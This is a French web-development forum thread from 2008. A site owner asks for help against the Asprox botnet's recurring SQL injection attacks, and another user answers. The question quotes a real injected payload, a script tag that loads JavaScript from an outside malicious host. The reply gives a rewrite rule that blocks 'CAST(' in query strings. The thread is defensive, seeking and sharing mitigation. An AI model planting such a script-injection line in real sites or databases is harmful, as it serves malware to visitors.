Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum. Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

Sujet : Injection SQL - ASPROX BOTNET [ Système / Sécurité ] (tbbuim1)

lundi 2 juin 2008 à 16:24:32 | Injection SQL - ASPROX BOTNET

tbbuim1

Bonjour à tous,

Comme des millions de serveurs dans le monde, mon serveur est attaqué par des injections de SQL : du style
<script src=http://www.redir94.com/b.js></script>
à l'intérieur de mes champs dans la base de données.

voir
http://www.authsecu.com/news/315-news-securite-entreprise-renouveau-des-attaques-par-injection-sql-selon-ibm.htm
http://www.matchent.com/wpress/?q=node/309
http://www.eweek.com/c/a/Security/Botnet-Installs-SQL-Injection-Tool/

J'ai contrôlé les rq et mis une fonction anti injection pour chaque rq pouvant être attaquées, mais rien n'y fait. fonction : Fn_NoSqlInject

j'ai fait la recherche du trojan msscntr32.exe mais je ne l'ai pas trouvé.

Bref, mon site est continuellement attaqué et j'ai beau enlever les lignes de la table qui sont infectées, elles se réinfectent tous les jours.

Quelqu'un a une idée?

Merci pour votre aide

TBBUIM

mercredi 11 juin 2008 à 10:16:46 | Re : Injection SQL - ASPROX BOTNET

TompouceTN

Bonjour,

J'ai eu le même soucis pendant quelques jours.
Pour me débarrasser des attaques, j'ai utilisé une règle de réécriture (avec ISAPI Rewrite), demandant de stopper le chargement de la page si on détecte "cast(" dans le querystring.
RewriteRule .*CAST\(.* . [F,I]
Depuis, plus de soucis.

Cela n'empèche pas de sécuriser au maximum les requètes. Chez moi aussi, il  y avait du boulot... certaines pages étant écrites depuis presque 10 ans... !

Bon courage
Tom



Cette discussion est classé dans : sql, www, injection, botnet, com


Répondre à ce message

Sujets en rapport avec ce message

Probleme SQL [ par yoyo ] Mon pb ne concerne pas directement ASP mais je suppose queqq'un pourra m'aider.La requete suivante est executee sur un serveur SQLServer 7.SELECT * FR Probleme avec SQL SERVER [ par valou ] salut,j'ai un probleme pour une requete en asp sur sql server.voici mon code:Set conn = Server.CreateObject("ADODB.Connection")connstring = "driver={S SQL SERVER 2000 ???? connection [ par Troyan ] j'ai toujours systematiquement la meme erreur.cela doit etre un parametrage de SQL2K mais j'ai pas trouvé !!Help Échec de la connexion de l'utilisateu SQL Requete [ par ZL ] j'ai une table, nommée T1 qui contient 5 enregistrements,par exemple,1,2,3,4,5;j'ai une autre table,nommée T2 qui contient 2 enregistrements,par exemp Transfert de donnees entre 2 BD SQL Server 2000! [ par ludo ] Bonjour, j ai un leger pb!Voila j ai deux bases de donnees SQL server 2000. Je veux recuperer certaines donnees d une ou +sieur tables d une BD et les probleme SQL ??? ou variable ASP??? [ par peguman ] Je souhaite me connecter à une base après vérification de l'identité d'un client...Je passe en parametre le log et le pass et je les vérifies dans ma Erreur sur requête SQL dans page ASP ... [ par IF ] Voilà, je lutte sur un petit problème, je ne comprends pas d'où vient l'erreur dans la requête SQL suivante :----------------------------------------- Probleme de requete ASP-SQL [ par peguman ] lors d'un e requete SQL d'insertion dans une table, l'erreur suivante apparait : ADODB.Field erreur '800a0cb3' L'opération demandée par l'application Requete sql asp [ par seb ] voila j'ai un tout petit problèmeJ'ai une requete asp qui fonctionnne sur les critère en chaine de caractère mais lorsque je souhaite réaliser mon cri requete sql asp [ par seb ] Pourquoi je n'arrive pas a créer ma requete select sur un critère numauto qui est mon identifiant de ma table access.login est un request.from du form


Nos sponsors

Sondage...

CalendriCode

Juillet 2009
LMMJVSD
  12345
6789101112
13141516171819
20212223242526
2728293031  

Consulter la suite du CalendriCode

Téléchargements

Comparez les prix Nouvelle version

Photothèque Nouveau !



Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés
Temps d'éxécution de la page : 0,842 sec

Google Coop CodeS-SourceS Google Coop CodeS-SourceS


Certaines images présentes sur le site (notament certains avatars) sont issues des collections IconShock, donc si vous souhaitez utiliser ces icons vous devez les acheter, ne les copiez pas et ne utilisez pas dans vos sites et applications sans les avoir commandé.